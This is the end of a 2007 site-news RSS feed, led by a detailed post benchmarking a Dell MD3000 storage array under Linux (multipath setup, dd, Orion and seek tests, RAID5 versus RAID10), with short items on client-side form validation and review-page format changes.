<pubDate>Thu, 13 Sep 2007 13:01:44 EDT</pubDate>
</item>
<item>
<title>Benchmarking the MD3000 powervault under linux - </title>
<description><![CDATA[<p><div style="padding:4px; border: 1px solid red;">Second update: I have finished comparing RAID5 to RAID10. RAID5 is about 20% faster with sequential reads but 20% slower with sequential writes. Orion reports that the total throughput over two RAID5 LUNs is about 20% slower than against two RAID10 LUNs with a 5:95 write:read ratio. Maximum sustained IOPS on the "small I/O" test also dropped from over 6000 to 4000, a drop of about a third. My conclusion is therefore that unless you need the maximum possible sequential read performance or the maximum possible space utilisation, you should avoid RAID5 and pick RAID10.</div> <br><div style="padding:4px; border: 1px solid red;">Update: Just a day after I posted this, Dell <A HREF="http://www.dell.com/downloads/global/products/pvaul/en/pvaul_md3000i_specs.pdf">released the MD3000i</A>, which appears to be an MD3000 using gig/e ports instead of SAS ports. Again, the performance of the Dell MD3000i is entirely obscure but my guess is that it is the same as the MD3000. The controller software certainly sounds very familiar! At least this time the "fully equipped" MD3000i with four gig/e ports can blame any benchmark results on the maximum wire speed of 4 gig/e ports (less than 100mb/sec x 4).</div> <br>I've been spending some time benchmarking the Dell MD3000 PowerVault storage array under SuSE 10.2 x86_64 linux. There isn't a lot of information out there on this unit; one of the more useful pages I found is on this blog: <A HREF="http://all.thingsit.com/archives/5">Performance of the MD3000 with ORION</A>. In summary: it is ok for the price we paid (half retail), but this storage array, with the guts of an old IBM DS4100 which had an anemic 485 MB/sec internal bus speed, is not able to max out the total sequential read or write performance of the 15 disks it is able to contain. I imagine if you expand it with MD1000 enclosures this deficit is even more obvious. More on that later. 
<br> <br><div class="wiki"><h3>The setup</h3></div>Two Dell 1950 hosts, each with two SAS 5/E HBAs (host bus adapter cards). The idea is to set up a highly available configuration. The SAS 5/E cards each have two ports but since the MD3000 has a maximum of 4 ports (two per physical controller module) I am only using ONE port on each card, and four SAS cables. Both Dell PowerEdge 1950 hosts also have two internal drives connected to a PERC5/i and configured as a single mirror for the OS. The MD3000 does not support booting a host OS. It is fully populated with 15 Seagate 15k SAS drives (136gb usable). <br> <br><div class="wiki"><h3>Theoretical throughput</h3></div>Each SAS 5/E card is PCI-X, and each slot has a dedicated bus on the 1950. Each SAS cable runs at 3 gigabit/second full duplex. Each of the 15 drives can sustain a sequential read of about 90mb a second and a write of nearly that much. If they were 300gb drives then read performance would be over 100mb/sec. There is little if any information from Dell on how the 15 drives are connected to the controller modules. <br> <br> att=1213246,r,400 The Dell advertising blurb describes the MD3000 as having a possible peak bandwidth of 1400MB/sec: <br><div class="bquote">Active-active RAID controllers can produce throughputs up to 1400MB/sec and approximately 90000 IOPS from cache</div> <br>I wonder if it can reach that speed? <br> <br><div class="wiki"><h3>Multi-path support the Dell way</h3></div>Since each host is connected to the MD3000 via two HBAs, two cables and two MD3000 controller modules, transparent fail-over support would be an obvious item on the wish-list. The Dell resource CD provides an RDAC module that you are required to compile yourself, and a newer mptsas kernel driver. 
There were several problems implementing things as Dell expect you to: <br><ul><li>The Dell-provided mptsas does not compile on vanilla kernel releases after 2.6.20 (such as Fedora Core 7) due to an API change to the work queues.</li><li>The Dell-provided mptsas does not compile on distro kernels patched for "wide port API" because the code checks for kernel version 2.6.18 or more before enabling it. SuSE 10.2 is, for example, kernel 2.6.16 (with patches). This is easily fixed by adding two #defines.</li><li>I also had trouble compiling RDAC due to an incorrect symlink.</li><li>The Dell-provided mptsas module is newer than the LSI official drivers, but there are no release notes or history for it so it isn't clear what it fixes or adds vs the standard module from LSI.</li></ul> <br>After trying the array successfully with Fedora Core 5 and CentOS5 (which is RHEL 5 64bit), and exploring all the above issues, in the end I settled on SuSE SLES-10-SP1 x86_64 (Suse 10 service pack 1 for 64bit) and used it as-is; there was no need to install anything other than the Java "SMdevices/SMmonitor/SMagent" stuff on the resource CD. <br> <br><div class="wiki"><h3>Multi-path support via multipath tools</h3></div>As an alternative to the IBM/Dell RDAC solution I went with multipath-tools. <br> <br><A href="http://christophe.varoqui.free.fr/">Linux multipath tools</A> provide some amount of device independent support for multipath IO. In brief, once configured correctly they export /dev/dm-N devices that one should use instead of /dev/sd? devices. The /dev/dm-N devices are transparently (hopefully!) failed over and back depending on what the multipath daemon finds is going wrong with the underlying devices. <br> <br>The problem with using multipath-tools on this MD3000 is that you must verify your kernel can speak RDAC in the device-mapper. 
This support comes in the form of a <A HREF="http://www.kernel.org/pub/linux/kernel/people/agk/patches/2.6/2.6.22/">bunch of device mapper kernel patches</A>, and Fedora Core 7 and perhaps most other distros do not have these by default. (I'm out of my depth here!). You'll know that you've not got them because you can't make multipath-tools work. SuSE 10.2 does have the patches. <br> <br>The multipath configuration file that I used is: <br> <br><div class="code"><pre><span class="codetext">
defaults {
        getuid_callout "/sbin/scsi_id -g -u -s /block/%n"
}
devices {
        device {
                vendor DELL*
                product MD3000*
                path_grouping_policy failover
                getuid_callout "/sbin/scsi_id -g -u -s /block/%n"
                features "1 queue_if_no_path"
#               path_checker readsector0
                path_checker rdac
                prio_callout "/sbin/mpath_prio_tpc /dev/%n"
                hardware_handler "1 rdac"
                failback immediate
        }
}
blacklist {
       device {
               vendor Dell.*
               product Universal.*
       }
       device {
               vendor Dell.*
               product Virtual.*
       }
}
</span></pre></div> <br>As you can see, I don't want multipath tools to try to probe either the DRAC5 management card "virtual devices", or the MD3000 management "Access disk" which appears as a 20gb drive that can't be used as a filesystem. Notice that the configuration file refers to the aforementioned kernel rdac support! (this is not the same as the Dell RDAC driver). Without the right kernel, the "path_checker" line will fail to work as will the "hardware_handler" line. 
<br> <br>If multipath-tools is installed without error then after a fresh boot you can do something like this (the -d flag is "dry run" and is more likely to get you output than just -ll if you have any other issues with missing kernel features): <br> <br><div class="code"><pre><span class="codetext">
# multipath -ll -d
3600188b00040945c000024b346e14eb1dm-1 DELL    ,MD3000
&#91;size=50G&#93;&#91;features=1 queue_if_no_path&#93;&#91;hwhandler=1 rdac&#93;
\_ round-robin 0 &#91;prio=3&#93;&#91;active&#93;
 \_ 2:0:0:1  sdf 8:80  &#91;active&#93;&#91;ready&#93;
\_ round-robin 0 &#91;prio=0&#93;&#91;enabled&#93;
 \_ 1:0:0:1  sdc 8:32  &#91;active&#93;&#91;ghost&#93;
3600188b00046e0290000638e46e14f64dm-2 DELL    ,MD3000
&#91;size=50G&#93;&#91;features=1 queue_if_no_path&#93;&#91;hwhandler=1 rdac&#93;
\_ round-robin 0 &#91;prio=0&#93;&#91;enabled&#93;
 \_ 2:0:0:0  sde 8:64  &#91;active&#93;&#91;ghost&#93;
\_ round-robin 0 &#91;prio=3&#93;&#91;active&#93;
 \_ 1:0:0:0  sdb 8:16  &#91;active&#93;&#91;ready&#93;
</span></pre></div> <br>You can see that I set up two LUNs, one mapped through HBA #1 with a backup through HBA #2, and the other the reverse. The hot-standby paths are called "Ghosts" by multipath. If I joined these two LUNs up via LVM2 or mdadm (linux software raid) then in theory I am load balancing between the two HBAs. If a single "path" to the storage array fails (HBA, cable or MD3000 controller failure) then one dm-N device moves to its buddy on the other HBA and we <i>should</i> still be in business. <br> <br>Note that if the Ghost devices are accessed, either deliberately or because of a real path failure, the MD3000 will report via the management console that it is in a "non-optimal" state because a LUN moved from its "preferred controller" to the backup controller. You can trigger this simply by using dd to read from a Ghost device. 
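<br> <br>Since touching a Ghost device by accident is enough to flip the array into its "non-optimal" state, it can help to list the Ghost paths before pointing dd or a benchmark at a raw sd? device. What follows is only a rough sketch in Python, not part of the original setup: the function names (parse_multipath, ghost_devices) are made up for illustration, the sample text is modeled on the output shown above, and the regular expressions are fitted to that one layout. Other multipath-tools versions print different layouts, so treat the patterns as assumptions.

```python
import re

# Sample text modeled on the `multipath -ll -d` output shown above.
SAMPLE = r"""3600188b00040945c000024b346e14eb1dm-1 DELL    ,MD3000
[size=50G][features=1 queue_if_no_path][hwhandler=1 rdac]
\_ round-robin 0 [prio=3][active]
 \_ 2:0:0:1  sdf 8:80  [active][ready]
\_ round-robin 0 [prio=0][enabled]
 \_ 1:0:0:1  sdc 8:32  [active][ghost]
3600188b00046e0290000638e46e14f64dm-2 DELL    ,MD3000
[size=50G][features=1 queue_if_no_path][hwhandler=1 rdac]
\_ round-robin 0 [prio=0][enabled]
 \_ 2:0:0:0  sde 8:64  [active][ghost]
\_ round-robin 0 [prio=3][active]
 \_ 1:0:0:0  sdb 8:16  [active][ready]
"""

# Assumption: a map header is a hex WWID immediately followed by "dm-N".
MAP_RE = re.compile(r"^[0-9a-f]+(dm-\d+)\s")
# Assumption: a path line is "\_ H:C:T:L  sdX major:minor  [dm state][path state]".
PATH_RE = re.compile(
    r"\\_\s+(\d+:\d+:\d+:\d+)\s+(sd[a-z]+)\s+\d+:\d+\s+\[(\w+)\]\[(\w+)\]"
)


def parse_multipath(text):
    """Return {dm name: [(sd device, H:C:T:L, path state), ...]}."""
    maps = {}
    current = None
    for line in text.splitlines():
        header = MAP_RE.match(line)
        if header:
            current = header.group(1)
            maps[current] = []
            continue
        path = PATH_RE.search(line)
        if path and current is not None:
            hctl, dev, _dm_state, path_state = path.groups()
            maps[current].append((dev, hctl, path_state))
    return maps


def ghost_devices(maps):
    """Return the sorted sd devices that are hot-standby (ghost) paths."""
    return sorted(
        dev
        for paths in maps.values()
        for dev, _hctl, state in paths
        if state == "ghost"
    )


if __name__ == "__main__":
    for name, paths in parse_multipath(SAMPLE).items():
        print(name, paths)
    print("ghosts:", ghost_devices(parse_multipath(SAMPLE)))
```

On a live host the same functions could be fed the text captured from running multipath -ll, and any device that ghost_devices returns is one to leave alone when benchmarking raw devices.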
<br> <br><small>Note: if you do not install a multipath solution and put two cables from the host to the MD3000 you will see two LUNs (sd? devices). If you try to use both at the same time, the controllers will thrash, moving the disk array back and forth from slot 0 to slot 1 trying to keep up with your access pattern, and performance will be awful. Don't ask how I figured this out.</small> <br> <br><div class="wiki"><h3>Benchmarking Introduction</h3></div>So it is all set up. How fast is it? <br> <br>I played around with benchmarking this thing in a number of different ways. I've used software raid to stripe md0 across dm-1 and dm-2 (hoping to see better throughput when both HBAs are teamed), and I've tried LVM2 instead of software raid. I've used the underlying devices directly, with and without partitions, and also tried with Ext3 and XFS. In general the more layers the slower things become. For instance, Ext3 on top of LVM2 on top of dm-N on top of sd? might be 20% slower than just raw access to /dev/sdX. <br> <br>The benchmarking tools I tried ranged from simple dd for sequential write and read, through hdparm -t for sequential non-buffered read, "seeker" (see below) for random single block IO and iozone for a grid of data, to Oracle "orion" for a simulation of database workloads. <br> <br>When running any benchmark you have to be aware of the chain of caches in use for the test. There are two possible caches of concern: the physical memory of the machine running the test, and the cache on the raid controllers inside the MD3000 (512mb, supposedly, although it isn't clear if this is 256mb per controller or what). There is also probably a small individual per-drive cache but that would be overwhelmed by the other caches. <br> <br>In order to avoid testing cache speed instead of I/O array speed I made sure that the hosts were rebooted with mem=768m which means they have minimal memory free for blockio cache. 
The Orion benchmark tool can take into account an amount of cache before it runs - it fills the cache with random data before performance measurements start - so I took advantage of that flag to kill the MD3000 cache. Other than that I basically tried to make sure the tests involved many times the physical available memory of the host. <br> <br>It is interesting to note that hdparm -t is nearly useless for this MD3000 because although it avoids any host cache it can't avoid the 256mb controller cache. hdparm -t can show the speed of an MD3000 LUN as 300mb/sec (pretty much the speed of one SAS cable). <br> <br><div class="wiki"><h3>The MD3000 "read" cache</h3></div>It is possible to disable the 'read' cache on a per LUN basis. I've seen it written that read caches on external storage units should almost always be disabled because you want to reserve as much cache space as possible for non-blocking write operations. The read cache can be set with an SMcli script which is fed to the SMcli utility: <br> <br><div class="code"><pre><span class="codetext"> set virtualDisk&#91;"1"&#93; readCacheEnabled=true readAheadMultiplier=1; </span></pre></div> <br>Setting the cache via the gui management interface is not possible. <br> <br>My conclusion so far is that for throughput tests, disabling the readCache had too big an impact. Performance on long sequential reads dropped remarkably without a readCache. This was unexpected (how can a tiny 256mb cache help with reading 8gb of data sequentially?) unless the readCache is helping the controller modules read ahead using multiple drives in the disk group, and disabling the cache crimps that ability. So I left the readCache enabled. <br> <br><div class="wiki"><h3>Total throughput tests</h3></div>The unit did not reach its theoretical performance in any total throughput test involving all drives. 
With 14 drives (7 unique and 7 more ready with duplicate data) total read performance could, theoretically, approach 80x14 = over one gigabyte a second! With a single SAS card and a JBOD array there is certainly evidence of <a href="http://oss.sgi.com/archives/xfs/2007-03/msg00154.html">this performance</A> under linux 2.6. Dual HBA cards and/or two SAS cables should support 600mb/sec to the host. <br> <br>Unfortunately the fastest I could get dd or iozone to go was about 280mb/sec in one direction. By combining two LUNs using software raid0, to combine controllers, speed rose to 370mb/sec for sequential read. <br> <br>Orion reported over 400mb/sec total throughput with a mix of reads and writes. IOzone would typically report around 300mb/sec seq write and a little more seq read. <br> <br>By mixing dd out and in, with three LUNs and two disk groups in total, throughput grew close to 600mb/sec. Perhaps with further experimentation it would be possible to determine what size disk group is optimal, and what mix of work generates the maximum total throughput. <br> <br><div class="wiki"><h3>Single block random reads</h3></div>Using the <A HREF="http://www.linuxinsight.com/how_fast_is_your_disk.html">seeker.c</A> random seek/read utility, modified to use 48 bit random numbers seeded correctly (not from time in seconds), and run in parallel 60 times or more, I could push the enclosure to about 6000 IOPS, at which point adding more work just increased latency with no increase in total IOs per second (reading the IOs from iostat). I think this result more correctly reflects the speed at which a 14 disk LUN can work than did the throughput tests. A single SAS drive can do only a few hundred IO operations per second (it depends mainly on the drive's average seek time). <br> <br><div class="wiki"><h3>Oracle 'Orion' benchmark</h3></div>The <A HREF="http://download.oracle.com/otn/utilities_drivers/orion/Orion_Users_Guide.pdf">Orion manual is here</A>. 
<br>Orion using a 5% write 95% read mix, generated a matrix of results which I include below in a spreadsheet. Scroll the iframe right to see the results graph. Worryingly, however, on <i>both</i> hosts the full benchmark hard-locked (no kernel panic) the machine about 3/4 the way through the 3+ hour run. <br> <br><center><iframe align=center width='500' height='300' frameborder='0' src='http://spreadsheets.google.com/pub?key=p2LxIsb-WRj0gf_37aVGyMw&output=html&widget=true'> <br></iframe></center> <br> <br>The spreadsheet has two tabs, one for MB/sec the other for IOPs. The matrix of results in the first tab represents a mix of small tasks and large tasks. With many small tasks and no large tasks, total throughput rises more slowly as workload increases (the bottom curve). With all large tasks and no small tasks (top curve), total throughput looks like it will plateau around 400mb/sec as workload increases. <br> <br>The orion command line is using two LUNs as though they were striped together in a single volume (-simulate raid0). The two LUNs used are not shown, they are listed in a config file that is created before orion runs. <br> <br>Other Resources: <br><ul><li><A HREF="http://spamaps.org/raidtests.php">Headache inducing comparisons of software and hardware raid and filesystem types</A></li><li><A href="http://www.redbooks.ibm.com/redbooks/pdfs/sg246363.pdf">IBM Redbook on performance tuning of DS4100 external storage units</A></li></ul> <br>Note: it appears to me that the MD3000 uses the same controllers as the IBM model DS4100. The same SMcli utility and script, same SMagent/SMmonitor utilities, same controller memory! <br> <br>Page 4 of the IBM manual gives the performance characteristics of the DS4100 that Dell do not: <br>IOPS from cache: 70k <br>IOPS from disk: 10k <br>Disk through-put: 485MB/sec (although DS4100 only supported slow SATA drives) <br> <br>You can pick up fully populated (SATA) DS4100s on ebay for $5k, retail was $21k. 
Pictures of the rear reveal a very similar arrangement of controller ports. <br> <br><div class="wiki"><h3>Conclusion</h3></div>Well, I am rather miffed that the MD3000 is pimped on the Dell site as a state-of-the-art (albeit lower-end) modular storage array but is actually an IBM DS4100 in Dell drag - very "End Of Life" gear, no? <br> <br>Documentation is appalling (the IBM manual is very good, however. Shame Dell didn't copy that as well). There is much more information on tuning the enclosure from IBM, which also provides the RDAC kernel module, although the IBM information is for their DS4100 only. <br> <br>Performance is adequate for the dollars (we bought ours on ebay as reconditioned equipment) but the controller modules are clearly not capable of driving 15k SAS drives to their limit, and the controller cache memory dates from an era where 1gb of host memory was a big deal!<br><br><a href="http://www.dslreports.com/shownews/Benchmarking-the-MD3000-powervault-under-linux-87401">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Benchmarking-the-MD3000-powervault-under-linux-87401</guid>
<pubDate>Sun, 09 Sep 2007 20:53:44 EDT</pubDate>
</item>
<item>
<title>Javascript form Live Validation - </title>
<description><![CDATA[<p>Today's example of YACJL (Yet Another Cool JavaScript Library) is "as you type" <A HREF="http://www.livevalidation.com/examples#exampleFormat">form validation</A>. Finally! A way to make sure your customers enter stuff exactly the way you want them to! <br> <br>But wait. You still need all the same validation on the back end, on your server. And until server-side JavaScript takes off, that validation will be written differently, in another language. Anyone can POST any data they like to the forms of your app, no matter how much guard JavaScript you load into your pages. So now you have two sets of validation that are almost certainly not going to match exactly. Hopefully the server-side one is tougher. <br> <br>Oddly, the documentation makes no mention of this trap for the unwary. In fact it even suggests you don't have to worry about it: <br><div class="bquote">This is useful for validating everything in a form when it is submitted. The return value of this can be used as a return value for the onsubmit event, <i>to stop the form from submitting if any fail</i>. The messages of the LiveValidation object will be displayed as if you have typed them in.</div> <br><a href="http://www.dslreports.com/shownews/Javascript-form-Live-Validation-87304">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Javascript-form-Live-Validation-87304</guid>
<pubDate>Thu, 06 Sep 2007 09:47:09 EDT</pubDate>
</item>
<item>
<title>Customer Service - </title>
<description><![CDATA[<p>This is part of our site "feedback" form. <br> att=1199407,c,400 <br>This is some feedback we got: <br> att=1199408,c,400 <br>Things that make you go .. hmm ..<br><a href="http://www.dslreports.com/shownews/Customer-Service-86470">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Customer-Service-86470</guid>
<pubDate>Thu, 09 Aug 2007 00:03:05 EDT</pubDate>
</item>
<item>
<title>Reviews and Speed Stat formats - </title>
<description><![CDATA[<p>The "<A HREF="/reviews">Reviews</A>" tab has been improved (I think), as well as showing an interesting stat on the relative frequency of good/indifferent/bad reviews per week. It also allows easy selection of reviews by entry of a single company name, and gives the same stats. <br> <br>The "<A HREF="/archive">speed test stats</A>" page has been improved to show just ISP name (not domain name), clicking on that name fetches the speed records for all known (to us) associated domains. Other minor format changes have been made as well. (You can still enter a single domain name to get a results graph).<br><a href="http://www.dslreports.com/shownews/Reviews-and-Speed-Stat-formats-86213">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Reviews-and-Speed-Stat-formats-86213</guid>
<pubDate>Mon, 30 Jul 2007 20:56:57 EDT</pubDate>
</item>
<item>
<title>Reviews format - </title>
<description><![CDATA[<p>I cleaned up the review format a little and added a button to make it a little more obvious how you can edit YOUR review. <br> att=1194148 <br><a href="http://www.dslreports.com/shownews/Reviews-format-86133">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Reviews-format-86133</guid>
<pubDate>Fri, 27 Jul 2007 18:12:06 EDT</pubDate>
</item>
</channel>
</rss>